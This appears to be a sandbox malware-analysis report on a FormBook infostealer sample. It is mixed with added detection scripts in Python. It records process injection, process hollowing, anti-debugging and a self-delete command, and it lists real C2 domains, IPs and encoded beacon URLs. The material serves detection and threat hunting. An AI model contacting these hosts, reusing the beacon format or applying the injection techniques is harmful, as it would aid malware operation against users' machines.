          Source: C:\Windows\explorer.exeDomain query: www.formula-kuhni.com
          Source: C:\Windows\explorer.exeDomain query: www.alliedcds.com
          Source: C:\Windows\explorer.exeDomain query: www.selectenergyservicestx.com
          Source: C:\Windows\explorer.exeDomain query: www.ugonget.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Users\user\Desktop\4oItdZkNOZ.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 240000
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: explorer.exe, 00000002.00000000.359917632.0000000004F80000.00000004.00000001.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.603385565.00000000008B8000.00000004.00000020.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.351192750.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000002.00000000.351192750.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
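The chain this section records (sample -> injected explorer.exe -> cscript.exe -> cmd.exe /c del of the sample) expressed as detection logic over process-creation and network events. This is an added example, not part of the Joe Sandbox report: the events are constructed to mirror the report's 'Process created' lines and behavior graph, the PIDs, the parents of the first sample process and of explorer.exe, the firefox.exe negative with its TEST-NET address, and the Sysmon-like field names are assumptions, and the two rules are the editor's, not Joe Sandbox signatures.

```python
"""Detection logic for the injection-and-cleanup chain shown above.

Added example, not part of the Joe Sandbox report. Events are constructed to
mirror the report's process tree; PIDs, the parents of the first sample process
and of explorer.exe, the firefox.exe negative and the Sysmon-like field names
are assumptions. The rules are the editor's, not Joe Sandbox signatures.
"""
import re

SAMPLE = r"C:\Users\user\Desktop\4oItdZkNOZ.exe"

# Constructed process-creation events (shape of Sysmon Event ID 1, simplified).
PROCESS_EVENTS = [
    {"pid": 1000, "ppid": 900, "image": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    {"pid": 1001, "ppid": 1000, "image": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    # explorer.exe is not a child of the sample: it was injected (APC / thread
    # context), so creation logs alone make the rest of the chain look shell-started.
    {"pid": 1002, "ppid": 600, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\SysWOW64\cscript.exe", "cmdline": "cscript.exe"},
    {"pid": 1004, "ppid": 1003, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"cmd.exe /c del '{SAMPLE}'"},
    {"pid": 1005, "ppid": 1004, "image": r"C:\Windows\System32\conhost.exe", "cmdline": "conhost.exe"},
]

# Constructed network events (shape of Sysmon Event ID 3). The explorer.exe
# destinations are from the report; the firefox.exe line is a constructed negative.
NETWORK_EVENTS = [
    {"pid": 1002, "image": r"C:\Windows\explorer.exe", "dst_ip": "103.86.176.10", "dst_port": 80},
    {"pid": 1002, "image": r"C:\Windows\explorer.exe", "dst_ip": "91.236.136.12", "dst_port": 80},
    {"pid": 1006, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe"}
# Images that should never originate web traffic on a workstation (assumption; tune per environment).
NO_BEACON_IMAGES = {"explorer.exe", "cscript.exe", "wscript.exe"}

# 'del' followed by an optionally quoted path ending in .exe
DEL_RE = re.compile(r"\bdel\b\s+['\"]?([^'\"]+\.exe)['\"]?", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_self_delete(events):
    """cmd.exe deleting an executable, launched by a script host, where that
    executable is the image of a process seen in the same session."""
    by_pid = {e["pid"]: e for e in events}
    seen_images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        parent = by_pid.get(e["ppid"])
        target = m.group(1)
        if parent and basename(parent["image"]) in SCRIPT_HOSTS and target.lower() in seen_images:
            hits.append({"pid": e["pid"], "parent": basename(parent["image"]), "deleted": target})
    return hits


def find_unexpected_beacons(net_events):
    """Outbound HTTP/HTTPS from images that should never talk to the web."""
    return [(basename(n["image"]), n["dst_ip"], n["dst_port"])
            for n in net_events
            if basename(n["image"]) in NO_BEACON_IMAGES and n["dst_port"] in (80, 443)]


def ancestry(events, pid):
    """Image names from pid up to the highest parent present in the log."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for hit in find_self_delete(PROCESS_EVENTS):
        print("self-delete:", hit, "ancestry:", ancestry(PROCESS_EVENTS, hit["pid"]))
    for beacon in find_unexpected_beacons(NETWORK_EVENTS):
        print("unexpected beacon:", beacon)
```

Process-creation logs alone make cscript.exe and cmd.exe look like children of the shell: nothing in them links those processes to 4oItdZkNOZ.exe, because explorer.exe was injected rather than spawned. That link exists only in injection telemetry (thread-context changes, APC queuing, cross-process memory writes, for example Sysmon Event ID 10 ProcessAccess), which is what the 'Thread register set' and 'Thread APC queued' lines above record. Run the two rules together: a script host deleting an executable that ran in the session, plus explorer.exe speaking HTTP to hosts it has no reason to contact.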

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Techniques from the report's matrix, grouped by tactic. A number in parentheses is the figure the report attaches to that technique; entries without a number are cells of the standard matrix grid that no signature matched.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion (3); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (11); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (241); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data

          Behavior Graph

Behavior graph ID 385307, sample 4oItdZkNOZ.exe, start date 12/04/2021, architecture WINDOWS, score 100. The graph's node data, rendered as a process tree (a bracketed number is the counter the graph shows on that node, i.e. created files or registry values):

Analysis-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures. Domain attached at analysis level: www.stkify.com.

4oItdZkNOZ.exe [18], started
    dropped: C:\Users\user\AppData\...\m9c3uhgbfqo.dll (PE32)
    signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
    +-- 4oItdZkNOZ.exe, started
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        +-- explorer.exe, injected (not spawned)
            network: aksharnewtown.com 103.86.176.10:80 from local port 49698 (WEBWERKS-AS-IN, WebWerks India Pvt Ltd, India); www.formula-kuhni.com 91.236.136.12:80 from local port 49703 (WEBHOST1-ASRU, Russian Federation); 18 other IPs or domains
            signature: System process connects to network (likely due to code injection or exploit)
            +-- cscript.exe, started
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                +-- cmd.exe [1], started
                    +-- conhost.exe, started


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
4oItdZkNOZ.exe | 31% | Virustotal |
4oItdZkNOZ.exe | 14% | Metadefender |
4oItdZkNOZ.exe | 33% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll | 10% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.4oItdZkNOZ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.4oItdZkNOZ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.4oItdZkNOZ.exe.26a0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.2.cscript.exe.4784e8.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
3.2.cscript.exe.4f57960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen

The packed sample scores 14% to 33% on the multi-engine scanners above, while every unpacked region scores 100%: detection of this sample depends on unpacking or memory scanning, not on the dropper's static bytes.

          Domains

Source | Detection | Scanner | Label
alliedcds.com | 0% | Virustotal |
www.yakudatsu-hikaku.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Verdict
http://www.formula-kuhni.com/hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.xn--ol-xia.com/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.recovatek.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1 | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py | 100% | Avira URL Cloud | malware
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jabberjawmobile.com/hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py | 0% | Avira URL Cloud | safe
www.th0rgramm.com/hx3a/ | 0% | Avira URL Cloud | safe
http://www.investmentpartners.limited/hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py | 0% | Avira URL Cloud | safe
http://www.stacksyspro.net/hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== | 100% | Avira URL Cloud | malware
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.ugonget.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== | 0% | Avira URL Cloud | safe

Only two of the /hx3a/ beacon URLs are flagged by Avira URL Cloud; the rest come back "safe", so URL reputation alone would miss most of this sample's C2 traffic. The font-vendor URLs (fontbureau, founder.com.cn, tiro, galapagosdesign and similar, some with trailing junk characters) are strings carved from explorer.exe memory, as the "URLs from Memory and Binaries" table below shows, not connections the sample made.

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus detection | Reputation
alliedcds.com | 107.180.50.167 | true | true | | unknown
www.tonton-koubou.com | 163.44.185.226 | true | true | | unknown
www.yakudatsu-hikaku.com | 118.27.95.215 | true | true | | unknown
www.xn--ol-xia.com | 81.17.18.198 | true | true | | unknown
www.jabberjawmobile.com | 104.21.37.16 | true | true | | unknown
stacksyspro.net | 34.102.136.180 | true | false | | unknown
aksharnewtown.com | 103.86.176.10 | true | true | | unknown
www.formula-kuhni.com | 91.236.136.12 | true | true | | unknown
www.stkify.com | 172.67.210.123 | true | true | | unknown
ugonget.com | 34.102.136.180 | true | false | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
investmentpartners.limited | 34.102.136.180 | true | false | | unknown
www.aksharnewtown.com | unknown | unknown | true | | unknown
www.stacksyspro.net | unknown | unknown | true | | unknown
www.th0rgramm.com | unknown | unknown | true | | unknown
www.investmentpartners.limited | unknown | unknown | true | | unknown
www.rainbowsdepot.com | unknown | unknown | true | | unknown
www.recovatek.com | unknown | unknown | true | | unknown
www.alliedcds.com | unknown | unknown | true | | unknown
www.selectenergyservicestx.com | unknown | unknown | true | | unknown
www.ugonget.com | unknown | unknown | true | | unknown

The three domains the report marks non-malicious (stacksyspro.net, ugonget.com, investmentpartners.limited) all resolve to the same address, 34.102.136.180, which points to shared parking or hosting rather than dedicated C2. FormBook configurations pad the contact list with decoy domains alongside the live C2, so check each host before treating the whole list as a blocklist.

                                                Contacted URLs

Name | Malicious | Antivirus detection | Reputation
http://www.formula-kuhni.com/hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py | true | Avira URL Cloud: safe | unknown
http://www.tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== | true | Avira URL Cloud: safe | unknown
http://www.xn--ol-xia.com/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py | true | Avira URL Cloud: safe | unknown
http://www.recovatek.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== | true | Avira URL Cloud: safe | unknown
http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py | true | Avira URL Cloud: malware | unknown
http://www.jabberjawmobile.com/hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py | true | Avira URL Cloud: safe | unknown
www.th0rgramm.com/hx3a/ | true | Avira URL Cloud: safe | low
http://www.investmentpartners.limited/hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py | false | Avira URL Cloud: safe | unknown
http://www.stacksyspro.net/hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== | false | Avira URL Cloud: safe | unknown
http://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== | true | Avira URL Cloud: safe | unknown
http://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== | true | Avira URL Cloud: malware | unknown
http://www.ugonget.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== | false | Avira URL Cloud: safe | unknown
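Every contacted URL above shares one shape: a single short path segment (/hx3a/), one short constant query value (6l=t8eTzfA8rB7py) and one long base64-like blob (yvLp6=...), with the parameter order varying between hosts. The following is an added example, not part of the Joe Sandbox report, that turns that observation into a hunting heuristic and an IOC extractor. The input list is copied from the table above (plus two benign URLs from the "URLs from Memory and Binaries" table as negatives); the path, token and blob regexes and their length thresholds are the editor's generalisation of this one campaign's beacons, not a published FormBook signature.

```python
"""IOC extraction over the 'Contacted URLs' table of this report.

Added example, not part of the Joe Sandbox report. The structural rule (short
single-segment path such as /hx3a/, exactly two query parameters, one short
alphanumeric token and one long base64-like blob) is the editor's
generalisation of the beacons listed in this report; the regexes and length
thresholds are assumptions, not a published FormBook signature.
"""
import re
from urllib.parse import urlsplit

# URLs from this report's 'Contacted URLs' table, plus two benign URLs from
# its 'URLs from Memory and Binaries' table as negatives.
OBSERVED_URLS = [
    "http://www.formula-kuhni.com/hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py",
    "http://www.tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA==",
    "www.th0rgramm.com/hx3a/",  # logged without scheme or query
    "http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py",
    "http://www.fontbureau.com/designers",
    "http://www.apache.org/licenses/LICENSE-2.0",
]

PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")           # one short directory, e.g. /hx3a/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long base64-looking value
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{8,20}$")         # short constant token


def split_url(url):
    """urlsplit() with a scheme forced on, because sandbox tables sometimes omit it."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url)


def split_query(query):
    """Split a query string without decoding: urllib's parse_qsl would turn the
    '+' inside the base64 blob into a space and break the blob check."""
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def is_beacon_url(url):
    """True if the URL has the shape of the beacons in this report."""
    parts = split_url(url)
    if not PATH_RE.match(parts.path):
        return False
    if not parts.query:
        return True  # path-only hit (the th0rgramm entry): weaker, but the same URI
    values = [v for _, v in split_query(parts.query)]
    if len(values) != 2:
        return False
    return any(BLOB_RE.match(v) for v in values) and any(TOKEN_RE.match(v) for v in values)


def beacon_domains(urls):
    """Sorted hostnames of every URL classified as a beacon."""
    return sorted({split_url(u).hostname for u in urls if is_beacon_url(u)})


def shared_tokens(urls):
    """Short query values across all beacons; a single value repeated on every
    host means the same identifier is sent to each C2 candidate."""
    tokens = set()
    for u in urls:
        if is_beacon_url(u):
            for _, v in split_query(split_url(u).query):
                if TOKEN_RE.match(v):
                    tokens.add(v)
    return tokens


if __name__ == "__main__":
    for domain in beacon_domains(OBSERVED_URLS):
        print(domain)
    print("shared token(s):", shared_tokens(OBSERVED_URLS))
```

The path segment is campaign-specific (a different build will use a different directory name), so the rule keys on structure rather than on the literal /hx3a/; that also means a legitimate site with a short path and two query parameters can match, and the heuristic belongs in a hunt query joined to process context (explorer.exe as the requesting process, as in this report), not in a blocking rule. The one constant token across every host is the value to pivot on when correlating other samples from the same campaign.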

URLs from Memory and Binaries

Name | Source | Malicious | Reputation (antivirus detections, where present, are listed beneath each row)
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000002.603524845.000000000095C000.00000004.00000020.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.tiro.com | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1 | cscript.exe, 00000003.00000002.605431320.00000000050D2000.00000004.00000001.sdmp | false | unknown
  • Avira URL Cloud: safe
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
